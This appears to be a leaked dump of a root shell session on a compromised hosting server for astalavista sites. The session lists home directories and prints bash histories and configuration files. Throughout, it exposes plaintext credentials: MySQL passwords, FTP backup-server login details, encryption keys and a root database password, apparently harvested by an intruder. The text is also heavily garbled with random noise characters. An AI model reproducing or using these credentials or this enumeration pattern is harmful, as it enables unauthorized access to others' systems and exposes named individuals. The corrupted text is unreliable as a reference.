, Y7 ~0 F: W% y( V, O2 a* }# |__| [__ | |__| | |__| | | | [__ | |__| #
; k% y, P. ?1 b4 ^: u0 t1 F5 H# | | ___] | | | |___ | | \/ | ___] | | | #1 _) x$ D" k3 T2 |, v: c4 C$ L
# #- ]: J/ E; Y! T* g* `
#####################################################% h& F3 d1 t' L
# #; E& F6 [% F$ Z3 L2 T9 r+ X* H. ^: D
# Admin Contact - 链接标记support@secureservertech.com #
0 T% k( s% f- t2 p% M# #
! i( F$ f# Q' D# Available ShortCuts #
7 S& `% L3 K& b# @, y# #3 j# ?1 j4 O+ V* R; P
# nst - list active connections #
3 ?! o0 d @2 h2 u. C6 }( n8 m# ddos - shows how many times each ip is connected #
, D( W$ @" Y# [9 I; n& J4 y# ltr - restart the webserver #( s6 ]6 _) |2 \, w- F5 N. e
# phpc - edit the php config file #
; K- B( j& ?. P) D# htc - edit the webserver configuration file #; g5 i. z6 ^2 e6 `1 u" r
# up - uptime #
7 h( d& n0 l/ N! F# etd - edit the motd of the day file #
% u, X; a1 c& A% {# htr - start and restart apache if needed #; W; ^, j+ `) }8 g
# syng - shows active SYN_RECV connections #+ e4 N7 ]$ b: f
# synd - syn flood blocker - “synd -h” for usage #
/ o& \+ V, A7 o$ a% h# u#####################################################( e2 i: F" d5 S' p0 b3 t; V" N
# NOTES: #
. ^( R! G+ L) P8 `# Last Upgrade - 12-08-2008 by JF #3 k; @$ ~& c# H, ~
# My.cnf/Mysql Optimization - 1-28-09 #
: ? ^6 j5 u; i5 }9 ?, ~+ t# #
) c" a' B) ` @# #
, n) w& H* X7 f" B. J& L# #7 G6 s7 f8 v6 r. |. ?$ f/ r
#####################################################7 C3 |5 `' ?2 o0 T8 ~5 D# i
* m0 Q) ]8 p2 L# i% j' }$ q" c
sh-3.2# lastlog | grep -v Never* Z+ W8 j+ Z; x- | u2 l* ^
Username Port From Latest' R" L, D' Z0 r- Z, y; ^1 J9 {
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
/ X' W. t% ?/ R( kadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
. a- S5 a$ ^# t3 w, o! icom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
, n$ ?; ?% `& P# R5 C1 u3 \' V: O) oastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
& u9 j+ \* k$ W- D( \( }
' `: {' x. L! u* q$ T/ hsh-3.2# ls -la
- I; ]) Z/ h% k# D, U3 _. jtotal 453376+ r% |6 x. H* F) p/ ~
drwxr-x— 15 root root 4096 Jun 4 08:40 .* k* U- T% D" r2 ~; w
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* ?; p2 D& l' T+ ~, ~ w$ Q
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
) o ~" |" I$ G/ b, v-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ h4 }, S2 t! U; M* h& E* k8 v/ P
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
( U" b+ J# y. M& n3 y4 P3 x6 A3 r-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
) {% Z$ O6 c- C; |6 f3 b% k) U-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
6 H+ a3 i# | ~& _-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
5 `% C( t0 c7 R( ]( ]- @-rwx—— 1 root root 1899 Oct 28 2007 bk.sh# ^# D) e* a# I9 C9 {
-rw-r–r– 1 root root 1327 Nov 29 2007 cert( [0 N2 v) E7 _# k- W/ i- B+ a
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql' S3 p u/ _2 k2 N& ^
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
( k' z! p* v7 ^8 k5 d1 k: K; \/ v-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc, s# A4 ?( ^( m6 e
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql6 |' W, f U7 @" I) \( A! p
drwx—— 2 root root 4096 Oct 28 2007 .elinks( G: i4 |) p3 a5 m+ P
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1; C5 h, ?$ J' Q! @- d
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 R5 n0 G" r& W2 ]" B, E2 [2 G9 ~
-rw——- 1 root root 0 Apr 16 13:19 .history
& {- h5 y/ U- z, m [- v' D-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
) j6 y, m# N& s% V, _( g-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
) _8 a3 q5 m% p-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
; W3 F/ G! m* h3 S6 q" F-rw——- 1 root root 35 Jun 2 14:23 .lesshst: a8 G) m( Z W8 I1 L* z1 D
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
3 I d; E, W# ?* ^' ~+ d- Wdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
8 |7 H# |1 j/ L* z: W2 |8 x-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz; Q' y2 `$ Y6 ~- w. X' X( ^/ `7 n0 ^# g
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
; { y+ q" o- D8 v7 p-rwx—— 1 root root 760 Sep 18 2008 lp
) X) ~2 h/ c0 \- ~: Y% pdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
: M3 d0 Y2 ^1 Q-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz+ B9 n1 I- [1 `$ v
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
: K% h) {" t7 b. X1 |( ?4 \drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9# {+ p% [6 P. v; x8 i1 c3 y5 P& ^9 V
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz; {0 r7 @- E: t( n$ U% o( W- u
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.35 b, }5 c0 d. b7 Y, i# g. U
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
/ P# s5 W( X$ L-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh! P/ _# q2 d, B2 b9 q3 f7 z
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
( f+ i2 r9 g9 S; Q-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history; I$ D/ U! O+ |9 o3 f# h
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport7 Z/ P W2 h, Z8 K: K
-rw——- 1 root root 41 May 20 2008 .mytop( N9 }# O" S/ y7 z& }; P
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- e' r9 M! ~* I6 ^2 P [-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
+ q% G2 k$ X- F9 Z! Zdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 o9 u( J S8 F-rw——- 1 root root 1462 Sep 21 2007 opt.php
7 u- P- C* H; Q3 U: e3 q-rw-r–r– 1 root root 3371 Sep 22 2007 p
7 C. \4 A" M" ~. w-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
, c- m3 |. S+ D1 n-rw——- 1 root root 1024 Feb 3 21:32 .rnd8 `" I3 w2 b" E' c: j( x' r( k3 X, _
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% {: H" s+ g, O5 H3 M, S# e
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
" c" X+ K, C C% V9 `drwx—— 2 root root 4096 Oct 10 2008 .ssh* U3 l# F2 s% g* n) n& u% W4 N. p; z
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
9 E2 E7 L* v/ x! @. R o r& w-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc# x+ e4 O% \; e
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
6 r, K( C. l8 ^$ U; h-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
/ a$ f4 w" m% L: t- X; cdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp5 e1 A+ `' \3 U$ e% z; p, t. U
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh4 G7 R% F4 y' ?; ]
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.02 K% N3 J1 T2 K3 s) l( s4 l/ N
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz21 \) R4 s) G: z+ N6 k
-rw——- 1 root root 12997 May 16 2008 .viminfo
7 U, Z, [' N' i- [
9 ^. G: j5 b( tsh-3.2# cat .bash_history9 V5 p( M' i. x/ m7 A
[snip]6 U3 p7 r! I M
wget cp4sst.com/sstlinux.tar.gz
- ]* x8 B" }, r5 star zxvf sstlinux.tar.gz
5 ]6 Q1 |( N, z" lcd linux-2.6.27.10
, o' `, v' x( e# p2 Z8 |. v$ dsh install.sh
* O# O1 h# j9 K* a" q# p3 N/ u pmake bzImage ; make modules ; make modules_install ; make install q @# _8 o5 K! M1 f
make clean
- d7 M6 K1 ]! M1 sservice mysqld restart! L# g) a4 s9 A( o- f
[snip]
$ N* |, X# M# h9 I$ s) Scd /usr/sbin/
2 j8 k5 S c% y9 H7 Ichmod 4777 traceroute3 ]" N5 T2 `+ v' Q+ D, p8 z
chmod 4777 ping4 y; N8 M* X# c2 @" H6 Z
traceroute -I 链接标记[url]www.astalavista.ch[/url]
( J9 r. a* ]( {! ^% E[snip]1 b$ f2 e+ o, P1 ^& G+ b
vi /etc/csf/csf.conf
' `. e1 B9 A) v& mtraceroute google.ch9 t$ U, C" p4 a) {$ i. q4 |
service csf restart
9 I& i7 `0 J/ t; N9 [4 a3 [2 F* Ctracert google.ch
/ N/ W1 y( a. B. Zservice csf restart
- b6 \5 Z1 h- |, q4 X# _$ jtraceroute 链接标记[url]www.google.ch[/url]9 w$ Q U ]# }2 ~
tracert 链接标记[url]www.google.ch[/url]
2 q$ ~2 m9 y3 V( l# R# Y) `5 }6 O8 Ptraceroute 链接标记[url]www.google.ch[/url]
9 V7 W" C3 \) v8 {# Olocate traceroute5 }+ _" U3 a# T6 `( U2 X0 d# s
chown 4755 /bin/traceroute
& E5 u2 v- ]8 {( lchown 4777 /bin/traceroute
X2 |" W! |5 \; f" q1 I; a$ Klocate ping. a4 m$ \$ S: J) d( N
chown 4755 /bin/ping
0 c, w+ `' r+ v" L0 ichown 4777 /bin/ping% \0 {/ U0 O0 z, M3 v3 K5 i9 d
cd /bin/
8 l% t( O1 B) cls -ali | grep ping# y4 [; D" d: y# ~% [% y! ~
chown root ping( G* T7 U- b- ^& K
chmod 4755 ping7 h; J2 q4 N4 a" w( D
ls -ali | grep traceroute- D9 w8 K( F1 ^. t
chown root traceroute. @4 q6 s, d" ]. ^) x8 R
chmod 4755 traceroute! t# {- g/ l9 j0 Q5 z4 D- z
ls -ali | grep traceroute# H4 w" E5 o7 C0 d: T
traceroute -I 链接标记[url]www.google.ch[/url]
7 Z8 l' c) @$ Z; ?. u& t; ~traceroute 链接标记[url]www.google.ch[/url]4 a" L7 r' b h2 \- A
whois pmsantos.ch+ ~" Q. }5 S6 Q& S- Z A+ S
[snip]! |: p+ ^$ |0 N2 y
mysql -h com_contrexx2_live < /root/defaultp_ports.sql0 E: I" W4 J# \/ N* L" H/ Q
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql* G+ T7 F# j0 Q/ i# I
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
$ }! G1 t. b6 I0 fmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
$ H0 ]7 z- M" g# G6 L% [$ \ gtop0 C: M! G8 J. h1 H9 }$ ^0 R; ^
ping ssth.ch J0 [3 X: U J/ T$ c
ping asdlkfaljgasd???ljg???lasj.ch+ n+ l% v0 [: l$ D! U( W5 r
ping asdlkfaljgasdlasj.ch7 }" {( {1 N& I6 F5 ~& o
ping 链接标记[url]www.ssth.ch[/url]6 y1 K7 V* N k- d$ H/ F8 m
ping ssth.ch
3 J3 X* y% o. Cnslookup 链接标记[url]www.google.ch[/url]
- h& T; n5 S3 ?# lnslookup 链接标记[url]www.ssth.ch[/url]
8 i& z0 j; {( `& R. `- \% {6 F' D0 mman nslookup
- ?0 I0 I2 {& \" T7 E E8 e, G- }3 A1 S4 iping 链接标记[url]www.google.ch[/url]
# D% z* ]' \) S0 S* Enslookup 链接标记[url]www.google.ch[/url]5 W. f3 H+ C( ^% t, Q& J
nslookup 链接标记[url]www.google.ch[/url]
( H: a( o" J5 L! i+ Hnslookup salfjasdlf.ch
) c* U0 q( ~% m6 V[snip]
8 [ ?9 O# M6 ] [6 a, O# fopenssl passwd -1 sadf/ T& S2 P+ B7 u) Z! H Y7 q
openssl passwd -1 5cZNHstdTy
# s) F Y, M* j- R2 a7 Fmysql
- R8 ^# r# G4 y8 k% H: ]mysql
" F! m5 l- g6 i1 C$ H/ ~locate proftp, q- I$ N/ X3 J5 j* r7 C
vi /etc/proftpd.passwd
4 D4 [/ S/ u8 L4 v/ wservice proftpd restart$ W( |$ V2 k4 u! r) B; N% H- `9 c3 ?
locate proftpd.conf5 z+ N! t; n; q1 D
vi /etc/proftpd.conf
( | V& J6 V o' G2 F# N- Nvi /etc/proftpd.passwd
+ K6 U; c( O( }4 n. U/ v5 ]service proftpd restart5 L0 H$ h; v: _ Z
[snip]. s6 V2 c( s2 ~. o; r
/bin/sh /home/com/backup_system/backup.sh
0 ?, E [( V1 ` N/ \+ c1 s; A& Dtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin9 a- i; t$ M1 r& Y! j# E+ @
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
. m. C1 `9 |! f2 \mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
$ Q2 ~9 h D% A- u7 c6 [. w7 \ls -ali
: `- T! A5 ^% l9 o1 v6 Fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql/ |; _ X' S2 q! e# p: q
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql' T( D3 d( U/ w$ \0 A4 j/ b
crontab -l
0 z0 B4 L' Q* a8 Ccrontab -l
5 P9 Y* n; G- Gphp -q /home/com/public_html/modifications/cronjobs/securitynews.php5 B/ p" E* V9 \' {4 [3 B' d6 M
/home/com/public_html/modifications/cronjobs/exploits.sh
4 ?0 r( r" A; S3 u8 uwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]( E; N0 h& p: j
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
7 N. T+ s" m5 t/ x; W, w9 N0 H6 Tcd lsws-4.0.3& O/ g. y+ ~% y1 V
sh install.sh
& b5 F+ z& S3 n" H5 k; p0 ?: y, f: [uptime# Y6 _( A; H& _" ]( N$ J
hdparm -tt /dev/sda+ [, ?0 }( X/ u9 S3 @' |
iostat
+ B7 b1 @* A4 T) h( k: syum install iostat
, ~, z# x/ s iiostat# m* I/ p9 A& G; U
whereis iostat
! G+ G% r# ?- m$ f) g& Jyjm clean all o; F! |" v+ x$ z
yum clean all ; yum -y update7 V+ Q/ [. n) p" Q3 q- d
iostat
$ t: @ G3 ~- z; Q8 u! h* E! n! a/ kyum install systat7 L5 P: J, ?4 b" h& f7 K" w6 v
rpm -qa | grep iostat
9 L5 H {- E* K4 E- O# `rpm -qa | grep sysstat2 N( J2 H7 d8 D0 Y1 Z8 Z8 S
rpm -qa | grep systat
[6 S# F; S: m* p5 Z; {3 q! U- ydmesg -c+ q: }) c, i# m8 X
sysctl -p B e P# |. M" m
uname -r3 K0 }' o( }7 _
cd /usr/src
& }, `" L- m+ Q( \2 dwget nix101.com/kernels/sstlinux.tar.gz. q; i8 X5 [+ C4 E [$ E: v$ Q
shutdown -r now# Q0 D& M( {$ k- w) P
nano -w /boot/grub/grub.conf
) g" I: W1 r$ c" Z/ {
5 C) g, h) S& Y- U+ t. j" P, j" wsh-3.2# cat .my.cnf
' i7 M" E' v3 l0 O: E% y[client]
3 f+ d/ Q6 n3 E& P. suser=da_admin4 F+ w' Q* y5 M' y4 u& X' @ l
password=X9dctmRH2 V9 [ G: I) n) m
0 h# [' W" H# c! Z5 Xsh-3.2# cat /home/com/backup_system/backup.sh3 n8 ?# d1 i* k$ a
#!/bin/sh+ H q1 M& H& t- Y7 G' ^. ?- E
#####################################################################
. y/ r) D# d. c" E# #) q% l. A! H- W8 o* U% V( L' ^( \
# incremental backup for astalavista.com #
7 I4 d) T, Q. I3 c# #2 `% `1 `0 H( H! q4 U% G
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
$ B1 Y5 }7 {, O# #
K) k9 L( v* n, d#####################################################################8 @, ]( _7 w W3 I6 d3 y
[snip]
6 Z4 c) ^- U$ O( ]9 W$ ^PROG_DIR=”/home/com/backup_system”;/ b; q% l, R% z. u+ z3 [
BACKUP_DIR=”/home/com/backups”;
: m; u$ J3 x# j) LDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
7 j. c, f/ w5 H# ftp for synology backup server2 }0 R5 V( d- [" p
FTP_HOST=”212.254.194.163″;: o9 |' n/ `# N$ _$ L" v% p
FTP_PORT=”21″;
4 ]7 q: x" _# Y& K" @3 r: mFTP_USER=”astalavista.com”;) ^. T8 u+ C, d4 P/ u, X% @+ k
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
; h" Z0 x! g; U8 D4 bFTP_DIR=”/astalavista.com”;
* _9 x8 u- U. { _( O# database1 X' B% a- t: u8 Q* [
DB_HOST=”localhost”;- }% M m4 _1 g
DB_USER=”contrexxuser2″;7 s" j, t/ d3 c$ \9 L6 @, W
DB_PASS=”0fEYNZgXz1pKe”;
% V- s4 V, X, h+ k4 s# ?% i5 vDB_DATABASE1=”com_contrexx2_live”;5 X. L0 @) P* _+ _
DB_DATABASE2=”com_contrexx2″;
! z G$ a6 |8 D. I& Z[snip]: a1 z1 S& ], m) J) P: R
ftp -in $FTP_HOST $FTP_PORT <<EOF
r# |& {: \# O7 E+ xquote USER $FTP_USER$ ^8 o3 p6 U" V$ S# a X5 D
quote PASS $FTP_PASS$ Q$ r% {% b' x& s5 l! b8 A9 P) y
cd $FTP_DIR: q3 x( p d5 @( `! q
put $DB_FULLNAME-SQL_Dump.tar
* s! D. |: f. ?' K I+ f& Q( ]+ lput $BACKUP_FULLNAME-Public_HTML.tar) ~, `) `( r5 o8 D% n
close0 F- u% S8 V5 D, C9 ~
bye: _0 e9 O9 z6 g1 |
EOF7 P3 @1 b2 m( C6 ?
8 c2 z5 B2 J& J8 p* @/ J" x* v, w0 U
sh-3.2# cd /home
h% P2 r9 L6 `8 f2 ]2 Psh-3.2# ls -la' W4 S7 p7 `* t: `& U
total 1209 S+ p' e4 R5 M) _) A, a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
" U# C& r1 n6 A: C6 N* m* Z% L+ wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..3 v- m" L" W5 i$ r
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
. c1 ? Z- ?6 `3 \-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
$ E3 G0 U7 V$ w8 D/ p, S-rw——- 1 root root 8192 Jun 3 02:45 aquota.user4 j( ^8 Y* {/ I2 ^4 @" g
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet- d; j+ S l' C- @( d* H
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup' h- Z O" k6 A
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141618 o, \. z( }( S' N( p L3 _7 T. O
drwx–x–x 10 com com 4096 Apr 28 12:40 com4 N$ @/ R* |% d6 t
drwxr-xr-x 2 root root 4096 May 17 2007 ftp! R% ~+ ?6 p3 {# F& I: D5 v: B
drwx—— 3 jon jon 4096 Sep 21 2007 jon
) N4 Q- U1 G* I% _1 [1 x! X: @drwx—— 2 root root 16384 Sep 11 2007 lost+found
0 ~# m5 ]+ L% H& L9 Ldrwxr-xr-x 2 root root 4096 Sep 14 2007 my
( E8 S' ~1 I( R4 Wdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- G, h ]! T& ~: x5 Z) |drwx—— 2 jon jon 4096 Sep 15 2007 test
5 n7 h: z! [' {: K0 q. h4 Idrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 }2 ]/ q* V+ @* d# u
5 [7 [& ?& {# N9 t" b }sh-3.2# cd admin' _, E7 ~, i! d* Y; [
sh-3.2# ls -la) s- L0 w1 @1 m6 M' q Q
total 17358960 T2 x) C4 w' m/ t( G+ Z, u
drwx–x–x 9 admin admin 4096 Nov 28 2007 .* j2 R$ m+ p3 K5 J! T; Q2 t4 F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 b" b$ W: B- H) H9 Udrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups V; R8 a9 M2 B v* h# e/ z; g0 U) E
drwx—— 2 admin admin 4096 Sep 28 2007 backups$ w; ^0 i4 t# o8 B" U, t
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
- l* i# e5 R2 O% a1 W, J-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
/ U3 J6 M, ]# R# @: U-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
2 C. g; L! Z4 r: b5 S3 d. ?; d: |-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc/ Z1 c$ @- C( [1 _' V4 Z* g9 J
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
" P' J0 ^# ] r5 q" u! J1 D4 w+ O" hdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains! s7 X6 R2 G+ ], a
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap9 u5 k9 c6 y& L: a" j
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
5 H1 Q' Z& Y) c/ @drwx—— 2 admin admin 4096 Sep 21 2007 mail9 E4 f6 w3 Q9 r$ T8 F1 d6 k
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr9 ?6 n- o& n# u+ ?( G
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 ]$ y o0 y: h7 ?-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
# Y! e: M2 c( O3 R-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
0 V' Y( z7 F+ Rdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups" F& J) ]& C% e4 T% Y5 g( w$ {
, `2 ?2 Z) T6 i! S6 }5 [% Zsh-3.2# ..! n4 s( Q" q! a& _; y9 u
sh-3.2# cd jon
' S* t1 j% c5 i( L8 o# zsh-3.2# ls -la
% y# \6 t. ?) a, \* N9 Vtotal 36. ]" o' [7 u L& Q( Q, `
drwx—— 3 jon jon 4096 Sep 21 2007 .& Q- d, ~) X5 E( Z2 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 |; r0 X7 M' X-rw——- 1 jon jon 53 Sep 21 2007 .bash_history. ~& H: n. |- N. O( x6 Z0 i5 J2 v
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
# N4 j |. c' N# y. u' V2 N-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile% ^5 W# P& p4 C, D1 l
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
& ]3 o0 U; l; k' c! G/ z% H-rw-r–r– 1 root root 24 Sep 21 2007 info.php
9 A' @6 [0 ?2 s6 r8 M: X3 }drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
! E8 o7 K; [( _3 e: C7 o# E
& K9 I8 D( x! R7 I d1 B, J$ ]sh-3.2# cd ..
7 V! _% _" I8 w, Esh-3.2# cd test
* }2 N3 y( B* F: Nsh-3.2# ls -la
7 s, z/ d0 h/ {" L" c8 `total 48
; I) M, u2 y [: G4 ?drwx—— 2 jon jon 4096 Sep 15 2007 .5 {9 k- [, U. h! }, G
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 l3 O8 ~: t) K W* S( T) `: S
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
: R: Z" O6 c6 x7 K) O0 R/ Z-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
U4 O1 A/ f1 y# g, H3 z3 Z9 c) F7 K-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
; c3 G: J5 f! k$ `3 w* n: K-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
$ p" F$ F1 ~( X& {sh-3.2# cat .bash_history/ L2 |9 Y. R2 _3 J7 o1 q2 ~$ A
/usr/bin/mysqladmin -u root password PoliuJhytg67# r. O4 ]/ B/ d5 M' s' M
4 a) S3 ^! B/ h" [sh-3.2# cd ..
1 x: q- J8 C$ J/ i! |: i5 psh-3.2# cd astanet" R; d2 C# T" B4 v) I
sh-3.2# ls -la
7 a- e+ U! s5 `' m9 _9 |' vtotal 52
9 @; W3 G2 q2 E3 j' O4 o. _drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .8 W8 Y! n, y( L; f( s2 |+ o
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... ]+ G# q- v) D0 `4 o V7 Y" n
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth$ q) h1 p+ O; H( _' _
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 B' c( d% @0 Z1 I-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout% g, J, Q1 [% x$ d
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ R2 N. S: S/ i
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc* P( o- t( E7 j- s" T
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ M7 p' j; j' m& I
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap3 T; @4 K! S8 r9 ]
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 J1 H1 R* F% O/ ]-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
$ |7 C- }( B' y' L6 A! ~1 ~7 M! Ylrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html. U& |. T+ {! h1 I! d0 P- c
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
, x8 o3 B4 B! E7 |5 v
& ^1 t* G" P9 \! Nsh-3.2# cd auth/
" P# _; m9 F7 U- Vsh-3.2# ls -la
) V0 J/ T& T! Y/ C: m- etotal 28) _ y8 G- o" I' Y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
- o! |$ L( A$ odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..* }: M- v; I# M5 o
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
8 C' W7 {8 I+ r& K. @, F: H# @+ O: Z" L-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
& o$ a, _2 J9 I- g) m7 ?-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
& o- w* H+ X* k8 ? ]& r-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
/ J8 K% `# [! o8 H5 ~-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd1 g c, g0 ^' |: I
( `1 _% @! o8 O* `
sh-3.2# cat hackercontest.config.inc.php% ?( W m2 r6 w" n9 k1 ]( X' @
<?PHP
* \$ F4 l& _0 Z0 u// Variabeln f?r Verbindung zur Datenbank //! {% e3 i* T/ a0 c
$conxHost = ‘localhost’; // MySQL hostname
. P' l9 ~7 E1 ?5 S3 \( h$conxUser = ‘hackercontest’; // MySQL user
. T- b+ Z( [3 c$conxPassword = ‘K6m@7dUc’; // MySQL password
+ t- W- y, s' W$ u" N2 _$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
+ H& p! h7 \) `! Z?>
* y' ?) i* Y, S bsh-3.2# cat hosting.config.inc.php6 p& @6 M# i/ ~. d2 ]/ I* B9 P- d: U9 w
<?PHP
9 U# |0 I d- J+ T& l// Variabeln f?r Verbindung zur Datenbank //
$ c) S/ R+ ^2 Y& q2 o! L: r$conxHost = ‘localhost’; // MySQL hostname
4 O3 b L* i$ n$conxUser = ‘hostinguser’; // MySQL user6 y$ W+ E' D; z0 m$ D% f
$conxPassword = ‘cXvB3981′; // MySQL password! f7 t0 g; e3 l
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
6 ]3 A6 ]; w8 I1 H% m. ]: O. g?>
, n1 w0 F/ G- y% w. D' s9 f7 m& @8 r
sh-3.2# cd ..7 s% A8 _( Z, J+ l5 U3 H, s6 l) w" l
sh-3.2# cd com
% ~- ^9 V8 W& j, k7 [sh-3.2# ls -la* _; l4 I8 f6 [; \
total 141208: ^( q0 ?6 I# l% V9 I) R9 `7 N
drwx–x–x 10 com com 4096 Apr 28 12:40 .
2 l+ s' X) u+ x1 t% @/ ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
